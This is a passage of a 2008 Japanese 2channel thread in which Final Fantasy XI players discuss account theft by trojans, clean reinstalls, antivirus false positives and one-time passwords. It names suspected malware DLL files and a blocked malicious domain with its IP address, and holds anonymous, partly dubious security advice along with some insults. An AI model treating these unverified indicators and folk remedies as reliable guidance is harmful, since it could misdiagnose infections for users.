804 名前：既にその名前は使われています：2008/08/19(火) 11:21:23 ID:w6SO7RbV: このスレで散々クリンインスコしてからって言われてるのに何も伝わってねえ
802みたいな人の世話もしなきゃならんとはサポセンの人も大変だな
805 名前：既にその名前は使われています：2008/08/19(火) 11:22:06 ID:FHD3vhmV: 抜かれている可能性大だな
なんでウイルス感染しているPCでログインするかな
806 名前：既にその名前は使われています：2008/08/19(火) 11:23:58 ID:hLQAHGV0: やっちゃったね(´～`；)
807 名前：既にその名前は使われています：2008/08/19(火) 11:23:59 ID:HYYSb48W: >>802
ＦＦ引退おめでとう
808 名前：既にその名前は使われています：2008/08/19(火) 11:25:45 ID:ehIRtwW/: 詐欺に会う人は何度でもあう
心に隙がある
809 名前：既にその名前は使われています：2008/08/19(火) 11:27:33 ID:a38mWj4T: 新しくHDD買ってＯＳ入れてＦＦ１１以外やるな
webもメールもすんな
ＦＦ１１プレイ終わったらＰＣからＨＤＤ外せ
プレイしたければ繋ぎ直せ
810 名前：既にその名前は使われています：2008/08/19(火) 11:30:23 ID:FHD3vhmV: 新品のHDDも感染していたとか情報があるんで、
新品買ってもウイルスチェック終わるまでOSインスコすんなよ
811 名前：既にその名前は使われています：2008/08/19(火) 11:31:13 ID:rhZr/eFk: パス抜かれたときと同じ状態で入ったんだからパスは抜かれている
すぐにパス変えろ
今はパスとか抜かれて業者の処理待ちの段階だと思っていい
812 名前：既にその名前は使われています：2008/08/19(火) 11:34:30 ID:4OXTUQPv: >>779
罠サイトが置かれてる成都あたりは、平均手取り年収で５万円以下だしな・・
813 名前：既にその名前は使われています：2008/08/19(火) 11:53:13 ID:hLQAHGV0: 【ただいま】パス変えてもらってきました。
あんまりインターネットしてなくて、友達に聞いた情報でやってました。
ここでクリーンインストールの重要性知って　慌てて聞いてみたんです・・
間に合ってよかったです・・。
814 名前：既にその名前は使われています：2008/08/19(火) 11:57:25 ID:oJNfV2s1: >>804
知り合いがサポセンにいるが、こういう人多いらしいよ…
ここ見て後手後手でも対策してる人はまだマシだってさ。

個人的にログインが面倒になっても、パスワ変更が面倒になっても
セキュリティが向上されてデータが守られるなら、
追加費用がかかろうがワンタイムパスワードになってもいい。
でも、大半のPS2ユーザーは「めんどくせえ」
「アカハックされる間抜けなPCユーザのせいでこんな糞仕様」って言いそう。
815 名前：既にその名前は使われています：2008/08/19(火) 12:02:07 ID:FHD3vhmV: セキュリティーソフト入れているからパス抜かれるなんてありえないと思っている人多そうだ
816 名前：既にその名前は使われています：2008/08/19(火) 12:02:54 ID:Jg6eh6i2: ウィルスセキュリティ0とか使ってるヤツに、そういうのが多そうだ。
817 名前：既にその名前は使われています：2008/08/19(火) 12:03:33 ID:hLQAHGV0: 一回コッキリのパスにしたらいいかもｗ
毎回モーグリが教えてくれたりo(^-^)o
818 名前：既にその名前は使われています：2008/08/19(火) 12:07:34 ID:FHD3vhmV: >>817
PCフリーズしたら終わりだなｗ
819 名前：既にその名前は使われています：2008/08/19(火) 12:11:46 ID:hLQAHGV0: >>818
(￣▽￣；)
820 名前：既にその名前は使われています：2008/08/19(火) 12:14:13 ID:03EDDn0n: >>819
(´～`；)
821 名前：既にその名前は使われています：2008/08/19(火) 12:23:50 ID:w6SO7RbV: >>817
おまえ反省してねーだろ
サポセンのﾈｰﾁｬﾝに迷惑かけたってわかってるのか
822 名前：既にその名前は使われています：2008/08/19(火) 12:26:37 ID:hLQAHGV0: 反省してるよ・・。
おにーちゃんだったし( ^^)Y☆Y(^^ )
ただ、知識なかったらどーにもなんないんだよね、
ここ来てよかった
823 名前：既にその名前は使われています：2008/08/19(火) 12:27:07 ID:hASSugUD: >>812
一ヶ月で年収稼げるのか
ｳﾗﾔﾏｼｽ
824 名前：既にその名前は使われています：2008/08/19(火) 12:27:57 ID:hLQAHGV0: あ、チャットだから性別わかんないや(￣▽￣；)
825 名前：既にその名前は使われています：2008/08/19(火) 12:29:12 ID:Yz2oiYGu: >>824
少なくともその顔文字が反省してるように見えねーわ
失せろチンカス
826 名前：既にその名前は使われています：2008/08/19(火) 12:34:00 ID:hLQAHGV0: アドバイスありがとうございましたm(_ _)m
827 名前：既にその名前は使われています：2008/08/19(火) 12:41:05 ID:bcm4OQCT: FFXIはソフト自体もパッケージ販売で有料なんだから、
トークン使ったワンタイムパスワードを導入してもよさそうだよな

銀行サイトだと、ウイルスが振込内容を改竄する場合があるから万全ではないが、
オンラインゲームなら、多重ログイン対応をしっかりやれば効果高いと思うし、
IDをトークンに書くような馬鹿以外は、物理的に盗難されても不正利用されないしな
828 名前：既にその名前は使われています：2008/08/19(火) 12:43:41 ID:FHD3vhmV: トークン化は是非導入してもらいたいな
今の状態だとPS2か箱○かFF専用PC作らないと恐くて出来ない
829 名前：既にその名前は使われています：2008/08/19(火) 12:45:01 ID:oIAuyJBd: みんな大変だな
830 名前：既にその名前は使われています：2008/08/19(火) 12:59:43 ID:SOAjzLX+: ちょっと質問、というか意見が聞きたいだけなんだけど
もし>>802みたいに放置したまま復旧して
パスを抜かれてた場合
凍結解除された瞬間入られるもんだと思う？
831 名前：既にその名前は使われています：2008/08/19(火) 13:02:50 ID:1luvE/ek: チンカスに失礼だろうが
832 名前：既にその名前は使われています：2008/08/19(火) 13:04:07 ID:SOAjzLX+: ごめんチンカス
ちょっと気になっただけなんだ
833 名前：既にその名前は使われています：2008/08/19(火) 14:22:54 ID:jDVcj3Uj: あまりPCに詳しく無いフレから相談を受けた内容なんだがちょっと意見を聞かせて欲しい。

１：フレのＬＳメンバーが立て続けに垢ハックを食らった。
２：ＬＳのホームページからリンクしてる場所のどこかから集団感染？。
３：垢ハックされた人はゲーム中にエラーで落ちることが多かった。

１－２番はいいんだけど、気になったのが３番の部分。
起動時では無くモグハウスに入った時にエラーが出ていたらしい。
この部分が垢ハックの要因になっている可能性があるのかどうか
調べたいんで以下の２点について心当たりのある人が居たら教えて欲しい。

①同じ現象が出た後に垢ハックを食らった(人が居る)
②外部ツールにより同じような問題が出る

エラー発生のタイミングがパスワードを使用する部分と違うから②の可能性があるんだけど
外部ツールのこと詳しく無いんでアドバイス出来ないんだよね。情報求む
834 名前：既にその名前は使われています：2008/08/19(火) 14:27:59 ID:teIsHZGI: 2かなぁ。
アカウントハックトロイとしては「FFXIの」じゃなくて
「PlayOnlineの」アカウントを盗るんだから
何かおかしな挙動が出るとすればPOLViewer。
FFXIについては起動・終了を含めて関知する必要がない(何もしない)。
835 名前：既にその名前は使われています：2008/08/19(火) 14:30:46 ID:ehIRtwW/: ついにオカルト板になった！
836 名前：既にその名前は使われています：2008/08/19(火) 14:33:18 ID:sPhXq6u7: スキャンはしたの？
ハックされてるとＰＣは不安定らしいぜ？
外部ツールではないと思うが、ＲＭＴしてたかも？
837 名前：833：2008/08/19(火) 14:34:14 ID:jDVcj3Uj: >834
自分もそう思ってるんだけど同じ現象が複数人で確認されているらしいのよ。
外部ツールでその現象(エリア移動か？)が出るのならツーラー乙と言えるんだけどね。
無いとは思うが新型の時のことを考えて状況をもう少し確認しようと思ってる。

>835
ＰＣにあまり詳しく無い人はこんなもんだよ・・・
問題箇所の予測と切り分けをするのが難しい。
838 名前：既にその名前は使われています：2008/08/19(火) 14:34:24 ID:teIsHZGI: ROの首無しBOTかよｗ
839 名前：既にその名前は使われています：2008/08/19(火) 14:35:24 ID:UJxsht4b: >>830
可能性はあるんじゃね。
もしかしたら俺もどっかのタイミングで抜かれてるかもしれない。
課金切れでログイン不可能にして対処するが……まさか業者が勝手に課金することもあるまい。

>>833
8月頭にハック食らった。重くなるとかの前兆は見られなかったけど、
白門でBGMが飛んだりリピートしたりすることがあった。関係なかったらごめんねごめんね
840 名前：既にその名前は使われています：2008/08/19(火) 14:38:27 ID:teIsHZGI: >>837
ゲームによってはキャラ選択でパス入力・倉庫(金庫)でパス入力といったように
ゲームクライアント上でも認証するけど、
FFXIはそういうの一切なくてPOLにおんぶにだっこだから
純粋なパス抜きの動作としてはありえないと思うよ。
罠ツールに仕込まれたとかならあるかもしれんが
ツール探し回って解析する気にはなれない。
841 名前：既にその名前は使われています：2008/08/19(火) 14:38:58 ID:FHD3vhmV: とりあえず応急処置としては課金とめる為にコンテンツの解約をすれば
支払いクレカにしてても大丈夫かな
業者がコンテンツの復活をしたなんて聞いたことがないし
842 名前：既にその名前は使われています：2008/08/19(火) 14:42:25 ID:9U6n/Yix: コンテンツ解約のみでPOLは解約してなかったら
元キャラ復活された上に新規倉庫作られてたって報告あったよーな
843 名前：既にその名前は使われています：2008/08/19(火) 14:48:41 ID:oJNfV2s1: 鯖移動の手順を分かってるし、復活もできそう
844 名前：既にその名前は使われています：2008/08/19(火) 14:56:09 ID:jDVcj3Uj: 再現性があり頻発するエラーってのが気にかかるところ。
通常は発生しないものだからＦＦのゲーム自体になんらかの外的負荷がかかってると思うのよね。
それがマルウェアによるものなのかアドバンテージｗなツールによるものなのか。
たとえば・・・・

・POL干渉タイプだが以前のように初回エラーで落ちず、フックしたまま常駐
・起動時以外のPOLのなんらかの動作時にパスワードを送出する
・それがモグハウス等のエリアチェンジ時
　エリチェン時ってPOLメッセージの更新のためにPOLのタスクが動いて無かったっけ？
・白門BGMが抜けるのはエリチェン後のエリア負荷が高い場所に移動したときに
　上記負荷により音楽などの読み込みが間に合わない場合に発生していた

ここまで来たら言いがかり＆取り越し苦労だとは思うけどねｗ
でも>>839の話を含め、こんな可能性もゼロでは無いと思ってる。
845 名前：既にその名前は使われています：2008/08/19(火) 14:59:01 ID:VhXkvU+q: 高価な装備をしている可能性があれば復活させてでも持っていくだろうね。
キャラ売ればそんな金額屁とも思わんだろうし。
846 名前：既にその名前は使われています：2008/08/19(火) 15:05:58 ID:XZaGZzSX: 垢ハックくらって、インできなくなったんだけど、
感染したファイルは消したんだけど、やっぱり再インスコした方がいいの？
もしかしてＰＣ初期化もした方がいいとか？
なんかめんどくさくなって引退でもしたいけど、
インすら出来ないから解約手続きもできない；；
847 名前：既にその名前は使われています：2008/08/19(火) 15:07:33 ID:AilT8oLN: オレ、ビシージのときにBGMがたまにループするんだけど…
今のとこスキャンでは何も出たことないんだが、不安になって来たor2
848 名前：既にその名前は使われています：2008/08/19(火) 15:08:44 ID:PGdRaaCw: >>846
クリーンインスコしとけ
というかもう新しいPC買ってそれ使え
古い方は情報検索と2ch専用にしとけ
849 名前：既にその名前は使われています：2008/08/19(火) 15:14:37 ID:XZaGZzSX: 考えてみたら、垢ハックされる前の数日、
プレイオンラインに入る時、なんか凄く重かったな；
あの時吸われてたのか；
850 名前：既にその名前は使われています：2008/08/19(火) 15:22:04 ID:sPhXq6u7: >>830 そのキャラの持ち物や価値次第では復元後も狙われると思うぞ？
復元後の最復元は現場無理みたいだから、それを狙ってわざと移転させキャラ売り飛ばすかもな。
851 名前：既にその名前は使われています：2008/08/19(火) 15:38:43 ID:SOAjzLX+: >>839 >>850
なるほどなあ　ありがとう
852 名前：既にその名前は使われています：2008/08/19(火) 16:16:36 ID:pwlHgLuR: >>846
インするだけだったらサポセンに電話して
パス再発行してもらえばインできるようにはなるよ。

引退する気ならそのままPOL解約しちまえばいいんじゃないかな。
853 名前：既にその名前は使われています：2008/08/19(火) 16:25:34 ID:w6SO7RbV: アカハック食らったっていうひと達さ、
ただ「；；」とか言うんじゃなくて>>6のテンプレで協力してもらえんのかしら
それで周知のウィルスか新規が現れやがったのかとかさ
ヒントになるし対策や予防になるから
復旧街中のヒマつぶしにでも教えてくれね
854 名前：既にその名前は使われています：2008/08/19(火) 17:08:09 ID:cZ9Rebz9: >>847
ループはたぶん関係ないと思うよ
855 名前：既にその名前は使われています：2008/08/19(火) 17:11:20 ID:HYYSb48W: >>853
出来ないから「：：」とか使ってるんだろｗ
いまだにクリインスコしたほうがいい？とかレスくるぐらいだし・・・。
856 名前：既にその名前は使われています：2008/08/19(火) 17:23:16 ID:AilT8oLN: >>854
ありがとう
前レスとか読んでちょっと安心した。負荷が多いとなるんだな。
857 名前：既にその名前は使われています：2008/08/19(火) 17:27:16 ID:S3/yNhrs: 自分の場合、>>16のような前兆症状が出てからハックされるまで1ヶ月以上経っていた。

このスレに来て「大丈夫でしょうか；＞＜」とか少しでも不安要素がある人は、
面倒でも即刻クリーンインスコしてパス変更しておくことをお勧めするけどなぁ。
すぐにハックされるとは限らないよ。
858 名前：既にその名前は使われています：2008/08/19(火) 17:53:22 ID:zovaKmVX: こんな症状があるんですけど大丈夫でしょうか；；

っていう情報は、バカヤロー的なレスからマジソレヤバイヨ的なレスまで
とにかくなんでも書いて欲しいところはありますね
ハック被害時のテンプレ仕様報告もそうだけど、新種や亜種の発見ヒントが
隠されてるとも限りません
859 名前：既にその名前は使われています：2008/08/19(火) 19:20:35 ID:GLVybUzv: もうXREAっていうウィルスでいいよｗ
860 名前：既にその名前は使われています：2008/08/19(火) 19:40:39 ID:7P9lQYik: ■はＰＯＬになんか対策したの？

まぁ対策とかされても
正直な感想は>>814なんだけどさ
861 名前：既にその名前は使われています：2008/08/19(火) 20:39:07 ID:6IveAHFa: ちょっと前に俺がこのスレで報告したけど
信オンの垢ハックするkernaegh1drv.dll
これは文字列を変えたりして検索しにくくしてるやっかいなやつ
これに感染すると、信オンはエラーの回線切断が多くなる

これがFFに対応したかはわからないが、何もプレイ環境変えてないのに
挙動がおかしくなったりしたら、自分の意図しないシステム変更が行われたと
解釈して警戒した方がいい
862 名前：既にその名前は使われています：2008/08/19(火) 20:46:17 ID:teIsHZGI: >>861
FF版もあった(今月頭)し、今はリネージュ2版。
863 名前：既にその名前は使われています：2008/08/19(火) 21:02:37 ID:tAMR+fzm: いまさら聞けないことを聞いてみるスレ　に先ほど投稿させて頂いたのですが
今FFへインしようとすると、POL-0022　と出て入れなくなってます。

内容文は　DNSサーバーへの接続を拒否されました、しばらく時間を置いて～　
とありました。

昨日の深夜0時、今日へ日付が変わる時にはイン出来ておりました。

当方PS2でプレイをしている身です。
ただの接続障害だったら、お手を煩わせて申し訳ありません。
864 名前：既にその名前は使われています：2008/08/19(火) 21:05:19 ID:J9/3IH/Q: ハックを装い別垢に装備預けて、巻き戻してアイテム増やしてるって奴はいるの？
865 名前：既にその名前は使われています：2008/08/19(火) 21:05:28 ID:9U6n/Yix: それははっくじゃなくてただの接続の問題
866 名前：既にその名前は使われています：2008/08/19(火) 21:07:27 ID:tAMR+fzm: >>865
ありがとうございます。
フレがハッキングに会い、敏感になっておりました。
867 名前：既にその名前は使われています：2008/08/19(火) 21:09:32 ID:x05YDKtK: >>864
アクセスログも見られるだろうからハック被害に遭わずにそうすることは多分無理
フレに頼んでハックまがいのことをやったとしても国内なら逮捕されかねないし
868 名前：既にその名前は使われています：2008/08/19(火) 21:17:04 ID:V2evZ1wk: 一度ハックされた垢でも
PCからXBOXに変えてパスも変えていれば
ログインしても心配ない？
それとも新垢にしないとダメなのかな
869 名前：既にその名前は使われています：2008/08/19(火) 21:19:00 ID:x05YDKtK: >>868
PCの方で一切パスを入力していなければ問題ナス
一度被害に遭うともうPCでやるの怖くなるからねー。

ところで「あうと」を変換すると第一候補がAutoだった。
トナメの名残か・・・・
870 名前：既にその名前は使われています：2008/08/19(火) 21:53:16 ID:teIsHZGI: >>864
http://changi.2ch.net/test/read.cgi/ogame/1218868358/81-90
871 名前：既にその名前は使われています：2008/08/19(火) 22:23:28 ID:XVOVu72N: ノートンが出した警告

Square Enix Co, LTD Playonline Viewerがインターネットにアクセスしようとしています。
プログラム：pol.exe
パス：D:\Program Files\PlayOnline\SquareEnix\PlayOnlineViewer

日付/時間はどうでもいいわな・・・

リモートアドレス：131.107.115.28 : http(80)
ローカルアドレス：(自分のIP) : 1742
プロトコル：TCP(アウトバウンド)

これってアウアウ？；；
872 名前：既にその名前は使われています：2008/08/19(火) 22:26:10 ID:PGdRaaCw: >>871
心配なら勉強しろ。勉強して安心しろ
873 名前：既にその名前は使われています：2008/08/19(火) 22:27:23 ID:p5J4tpNf: 俺のPOLもネットにアクセスするなあ
やっべー感染してんじゃね俺
874 名前：既にその名前は使われています：2008/08/19(火) 22:28:21 ID:x05YDKtK: >>871
ぐぐってきたけどそのIP自体はマイクロソフトっぽい

583 ：既にその名前は使われています：2008/07/27(日) 18:35:08 ID:JcCznOpR
pol.exeがcrl.microsoft.comに接続しようとしてたんだけど
これ何かわかる方いますか？Outboundだから送信ぽいんですけど・・・

584 ：既にその名前は使われています：2008/07/27(日) 18:40:51 ID:OdA/Dphx
>>583
IPアドレス　＝＞　「 131.107.115.28 」
ホスト名変換　＝＞　「 crl.microsoft.com 」（※以下改行の関係で略）

590 ：既にその名前は使われています：2008/07/27(日) 20:06:36 ID:y1Qq8vPS
>>583
Pol.exeがcrl.microsoft.comに接続しようとしてたん？
一応マイクロソフトの鯖ではあるよ。

DirectXやらDrawやらが読み出されて、そんとき署名確認かなんかでつなぎにいくのかなー。
その場合はPol.exeが見かけ上crl.microsoft.comに繋ぎにいってるようには見えるとは思う。
875 名前：既にその名前は使われています：2008/08/19(火) 22:29:21 ID:GLVybUzv: [Querying whois.arin.net]
[whois.arin.net]

OrgName: Microsoft Corp
OrgID: MSFT
Address: One Microsoft Way
City: Redmond
StateProv: WA
PostalCode: 98052
Country: US　　　→　（アメリカ合衆国）

NetRange: 131.107.0.0 - 131.107.255.255
CIDR: 131.107.0.0/16
NetName: MICROSOFT
NetHandle: NET-131-107-0-0-1
Parent: NET-131-0-0-0-0
876 名前：既にその名前は使われています：2008/08/19(火) 22:29:37 ID:orlF/jXs: >>864
ハックを装う馬鹿は国内で今のところいないんじゃねーかな
被害者のアイテム増殖はまぁその見舞金っうかプレイできなかった期間の保証ってことでみのがされているのかなぁ？
877 名前：既にその名前は使われています：2008/08/19(火) 22:30:20 ID:GLVybUzv: つ ttp://www.cman.jp/network/support/go_ip.cgi
878 名前：既にその名前は使われています：2008/08/19(火) 22:31:01 ID:GLVybUzv: まちがえたｗ
つ ttp://www.cman.jp/network/support/ip.html
879 名前：既にその名前は使われています：2008/08/19(火) 22:39:23 ID:bCsbIYX8: クリーンインストールしてカスペ入れて起動したら

キーロガーを検知しました。プロセスはキーボード入力の出力先を変更しようとしています。
疑わしい動作:keylogger
プロセスを実行します(PID:324)
\PlayOnline\SquareEnix\PlayOnlineViewer\pol.exe

て出た・・・。これヤバイ？
この後の処理候補としては
→処理終了　終了します
→許可　処理を実行します
→信頼ゾーンへ追加　プロセスを実行しますの除外ルールが作成されます
があるんだけど・・・。
880 名前：既にその名前は使われています：2008/08/19(火) 22:40:32 ID:ikHAkJIr: >>879
窓つかってんだろ
881 名前：既にその名前は使われています：2008/08/19(火) 22:41:42 ID:bCsbIYX8: 窓って何？(´・ω・｀)
882 名前：既にその名前は使われています：2008/08/19(火) 22:42:03 ID:ikHAkJIr: ウィンドウ化してんだろってこと
883 名前：既にその名前は使われています：2008/08/19(火) 22:42:14 ID:rXwzbCX+: >871みたいなのってマジで言ってんの？釣り？どっちだ
なんかね、最近もうよくわからんようになってきたんだが・・・
884 名前：既にその名前は使われています：2008/08/19(火) 22:42:37 ID:PGdRaaCw: >>879
過去スレ16を参照
ちなみに他のソフトでも引っかかる
885 名前：既にその名前は使われています：2008/08/19(火) 22:45:22 ID:bCsbIYX8: 過去ログ見れないんで説明をお願いします(´・ω・｀)
886 名前：既にその名前は使われています：2008/08/19(火) 22:48:29 ID:hLQAHGV0: >>883
釣りでもいいじゃん。少なくてもここで救われる人はいる
嘘なら嘘で　それでハックの被害でないわけですし(´Д`)ｂ
887 名前：既にその名前は使われています：2008/08/19(火) 22:51:15 ID:ZXV13oAC: 過去スレ16のかすぺたんの部分をはるお。

375 ：既にその名前は使われています：2008/03/28(金) 20:57:57.99 ID:PVtDW02D
WindowsXP SP2　updateも○
IE7
リアルプレイヤー削除済
PG2導入
カスペルスキートライアル版

この環境で、完全スキャンをかけても感染はなし。
ところが、POL起動＞FF11起動すると全画面表示になって最初の「はい」「いいえ」を選ぶところで
プロアクティブディフェンス起動。
キーロガーを検出しました。プロセスはキーボード入力の出力先を変更しようとしています。
疑わしい動作keylogger　プロセスを実行します（PID:3208）
C:Program files\PlayOnline\SQUA...\pol.exe

こんな表示出るのだけど大丈夫なのでしょうか・・・
888 名前：既にその名前は使われています：2008/08/19(火) 22:52:17 ID:ZXV13oAC: 376 ：既にその名前は使われています：2008/03/28(金) 21:03:37.47 ID:HB4+BPXL
>>375
pol.exeはカスペに引っかかるらしい
多分その誤作動だとおもうけど断言まではできないなー

377 ：既にその名前は使われています：2008/03/28(金) 21:17:22.61 ID:FSlsiE6T
オートログイン機能をonにしていると見た

378 ：375：2008/03/28(金) 21:19:03.69 ID:PVtDW02D
>>376
なるほど…
スキャンで感染なかったから安心していたのですが。
原因わかるかでインしないほうがいいのかな。
889 名前：既にその名前は使われています：2008/08/19(火) 22:53:05 ID:ZXV13oAC: 379 ：既にその名前は使われています：2008/03/28(金) 21:23:49.02 ID:NIEYDkXY
かすぺたん＜pol.exe これってキーロガーじゃない？いいの？ねえいいの？
君＜うーうんそれはFF11といってね、ログインするためにキーボードから入力するんだよ。
でおｋじゃないかな。

かすぺが言う、そのファイルが信頼できるものであれば大丈夫でないの。
これ
＞C:Program files\PlayOnline\SQUA...\pol.exe

380 ：375：2008/03/28(金) 21:32:56.29 ID:PVtDW02D
>>377
言われて見れば…
ソフト導入すれば安全だと思い込んで、オートログイン設定のままでした…

>>379
わかりやすい説明、ありがとうございます。

安心してログインします（オートログインやめて）
助言いただいた皆様、ほんとうにありがとうございます。
890 名前：既にその名前は使われています：2008/08/19(火) 22:54:33 ID:zovaKmVX: スレNo.20以前の過去ログは

【FF11】アカウント不正ログイン被害まとめ　ttp://ort.sakura.ne.jp/taisai/

にあります
テンプレから外さないほうがよかったかな
891 名前：既にその名前は使われています：2008/08/19(火) 23:04:22 ID:K/7vIHPF: C:\Documents and Settings My Documents\受信したファイル\wzcsvbxm.dllKarnaeghDrv.dll って出たんですけど関係ないのですか
892 名前：既にその名前は使われています：2008/08/19(火) 23:10:18 ID:bCsbIYX8: な、なるほどヽ(;´Д｀)ノ
大丈夫な様で安心して寝れるお。
みんなありり(´・ω・｀)
893 名前：既にその名前は使われています：2008/08/19(火) 23:35:09 ID:X72S8RF0: >>890
上げて無くていいよ。
ぐぐらない奴にはなに教えても再犯する。

>>891
どうやってでたの？
何のポップアップででた？
894 名前：既にその名前は使われています：2008/08/19(火) 23:40:36 ID:K/7vIHPF: ファイル名を指定して実行でマイコンピュータで検索「wzcsvbxm.dll」って入れたら
出てきました。
895 名前：既にその名前は使われています：2008/08/19(火) 23:48:50 ID:rXwzbCX+: system32にいたの？だったらアウツじゃね
896 名前：既にその名前は使われています：2008/08/19(火) 23:53:14 ID:rXwzbCX+: というか>>891の環境
flashが最新じゃなくてスクリプト全オンなら高確率でさよなら
897 名前：既にその名前は使われています：2008/08/19(火) 23:55:08 ID:K/7vIHPF: １回電源切ってからもう一度検索したら消えてました。
・・・何だったんだろ？
898 名前：既にその名前は使われています：2008/08/19(火) 23:55:36 ID:KZn6yQAP: >>891
C:\Documents and Settings My Documents\受信したファイル\
ってことは　メッセンジャー経由で受信したってことみたいなんだけど
もしそうなら　送信元はどこでしょ？
899 名前：既にその名前は使われています：2008/08/19(火) 23:56:36 ID:1lEQFvWG: つーか
「wzcsvbxm.dllKarnaeghDrv.dll」だとか
「ファイル名を指定して実行でマイコンピュータで検索」だとか
支離滅裂にも程があるがな

釣りならもう少し上手くやりなされ
900 名前：既にその名前は使われています：2008/08/19(火) 23:59:42 ID:rXwzbCX+: さっきから釣りだかマジだかわからん奴沸いてるがこいつか？ｗ
釣りにしてはあまりにワカメなんで逆にマジなのかとか思ってたがｱﾎくさ
901 名前：既にその名前は使われています：2008/08/20(水) 00:04:09 ID:dxWRblDv: ハックの対応を見てスクエニにの対応の底の浅さを目の当たりにしたわけだが、
今回発売するインゲームアイテムの詳細を見てさらにあきれてしまった・・・。
餌を垂らすだけ垂らしておいて、エンチャントを公表しないってどうなのよ(;'Д`)
受付終了した後に「回数制限あります」なんて言いそうで怖いよｗ
902 名前：既にその名前は使われています：2008/08/20(水) 00:05:40 ID:Hv2Ynqi7: 最近ｐｃ買ったばかりだったので、ごめんなさい。
903 名前：既にその名前は使われています：2008/08/20(水) 00:08:52 ID:FIAYpDwD: スレ違いになるけもだけど、
>>901さん　その詳細ってどこでみれますか？
904 名前：既にその名前は使われています：2008/08/20(水) 00:10:00 ID:7eFo1wmv: >>903
公式
905 名前：既にその名前は使われています：2008/08/20(水) 00:11:04 ID:xoYW+K8y: >>903
公式にでちょるよ
906 名前：既にその名前は使われています：2008/08/20(水) 00:11:24 ID:GwT9rzgL: >>903
詳細ってほどでもないけど、普通に公式ページのことです。
ttp://www.playonline.com/ff11/topics/special/080818.html

僕もスレ違いのスレ汚しｽﾏｿ
907 名前：既にその名前は使われています：2008/08/20(水) 00:11:48 ID:FIAYpDwD: ありがとーー！
908 名前：既にその名前は使われています：2008/08/20(水) 00:12:36 ID:oHCLEqq8: ●● RMT業者の垢ハックが多発している件37 ●●
★このスレで紹介されるURL(外部リンク)を踏むのは、すべて自己責任でお願いします
　　・Windows及びFlashPlayerなどのソフトが最新の状態であることを確認してください
　　・使用ブラウザのスクリプト実行を不許可にすることをお勧めします
★前スレ　●● RMT業者の垢ハックが多発している件36 ●● http://changi.2ch.net/test/read.cgi/ogame/1218621315/
■リアルタイムで被害に遭われている方へ(↓でスクエニに被害報告を)
　　　不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
　　　受付：月曜～金曜　11:00～19:00(土・日・祝・指定休日はお休み)
■テンプレ = ttp://miku.xrea.jp/template/ (「一般テンプレ」に関してはこちらのサイトをご覧ください)
　※xreaサイトのため後日ミラーサイトURLの紹介があちら管理人様よりあると思います
■まとめサイト
FF11Warning（垢ハックについての対策とか詳しく載ってます）　ttp://miku.xrea.jp/
　　　　　(xreaが不安な人はミラーサイトへ = ttp://www.geocities.jp/ff11warning/)
FFIX Virus問題まとめサイト（初心者さん向け）　ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
【FF11】アカウント不正ログイン被害まとめ（スレNo.20以前の過去ログあり）　ttp://ort.sakura.ne.jp/taisai/
★「巻き戻し情報」「スクエニに法的責任を！」「誰が悪いかランキング」「被害者の会を作れ」などは別スレでお願いします。
　　別スレ　●● FF11垢ハック巻き戻し状況報告スレ2 ●●　http://changi.2ch.net/test/read.cgi/ogame/1218868358/
★そのサイトが安全かどうかの鑑定が欲しいかたは↓に行ってください(このスレでの鑑定依頼はNGです)
　　勇気がなくて踏めない人のための鑑定ｽﾚPart18　http://pc11.2ch.net/test/read.cgi/hack/1208760889/
　　※専ブラで画像を先に読み込む仕様になっている場合は設定を変えてください(jpg偽装のウイルスとかも鑑定されているようです)
909 名前：既にその名前は使われています：2008/08/20(水) 00:16:58 ID:oHCLEqq8: 次スレの季節も近いので、とりあえず変更Topテンプレ出しておきます
改行の都合で行間がなにもなくてすっごい見づらいですけどm(_ _)m

「【FF11】アカウント不正ログイン被害まとめ」さんのところは
まぁ入れられるだけのスペースはありそうでしたので復活してみました

FF11Warningさんのところのテンプレミラーサイトについては
あちらを回ってみましたがURLを見つけられませんでしたので
まだリンク先はアップされていないのかもしれません
(わたしが見つけられなかっただけならごめんなさいですけど＾＾；)
910 名前：既にその名前は使われています：2008/08/20(水) 00:17:28 ID:yFz3Tt/k: さっきGoblin Clubの納品パターン報告したらPG2が点滅したんで、
開いてみたら、ROwikiで危険ドメインと指定されている
「666■lyzh■com(208■73■210■32)」へのアクセスをブロックしたとの表示が
もしかして、ゴブクラかゴブクラで使ってる広告に何かされたのか？
911 名前：既にその名前は使われています：2008/08/20(水) 00:33:13 ID:LbYh2xV6: 広告ないよね、あのページ
ってことは・・・？
912 名前：既にその名前は使われています：2008/08/20(水) 00:34:44 ID:cc9irU8x: 一番下に広告あるよ
今、調べてるけど怪しいものはいまんところ無し
913 名前：既にその名前は使われています：2008/08/20(水) 00:37:45 ID:yFz3Tt/k: 俺も各ページ見てみてはいるんだが、報告ボタン押した時だけPG2が反応するんだよね
それ以外は無反応なんだが
914 名前：既にその名前は使われています：2008/08/20(水) 00:45:43 ID:cc9irU8x: うーん、ゴブクラって今日始めて見たけど
作りが、あんまよろしくないね・・・

とりあえず、DBのテーブル名とカラム名がすぐわかったよ(^-^;
ゴブクラの作者見てるかな？
915 名前：既にその名前は使われています：2008/08/20(水) 00:49:06 ID:FIAYpDwD: ちょっと質問なんですが、
イインラインフレームは防げないって友達にいわれたのえすが
今一わからなくて・・・
HP覗いた時点でアウト？HPに付属してある画像や何かしら
覗いたらアウトですか？今では何ググるのも怖いです
916 名前：既にその名前は使われています：2008/08/20(水) 00:51:23 ID:DQdsdQrs: ゴブクラの広告に入ってたらかなりやばいな
合成職人してるんだが納品物のチェックのために毎日１２時過ぎに見てる
917 名前：既にその名前は使われています：2008/08/20(水) 00:52:41 ID:oHCLEqq8: >>915
FirefoxにNoScriptいれて、IFRAMEを不許可にすれば大丈夫ですよ
918 名前：既にその名前は使われています：2008/08/20(水) 00:57:40 ID:3PI2lhS+: ゴブクラって合成板に専用の掲示板持ってたはず
そこで警告すれば管理人さんが動いてくれそうだけど
919 名前：既にその名前は使われています：2008/08/20(水) 01:04:47 ID:LbYh2xV6: このサイトについて、のところを見れば掲示板につける
けど、以前に間違えている部分を突っ込んでおいたが見向きもされなかったｗ
その部分未だに間違ったままなんだけど諦めてるｗｗｗｗ
920 名前：既にその名前は使われています：2008/08/20(水) 01:06:22 ID:FIAYpDwD: >>917
そうですか、ありがとうございます
921 名前：既にその名前は使われています：2008/08/20(水) 01:06:40 ID:ETLZZMwk: かなり回してるけど引かないなあ・・・
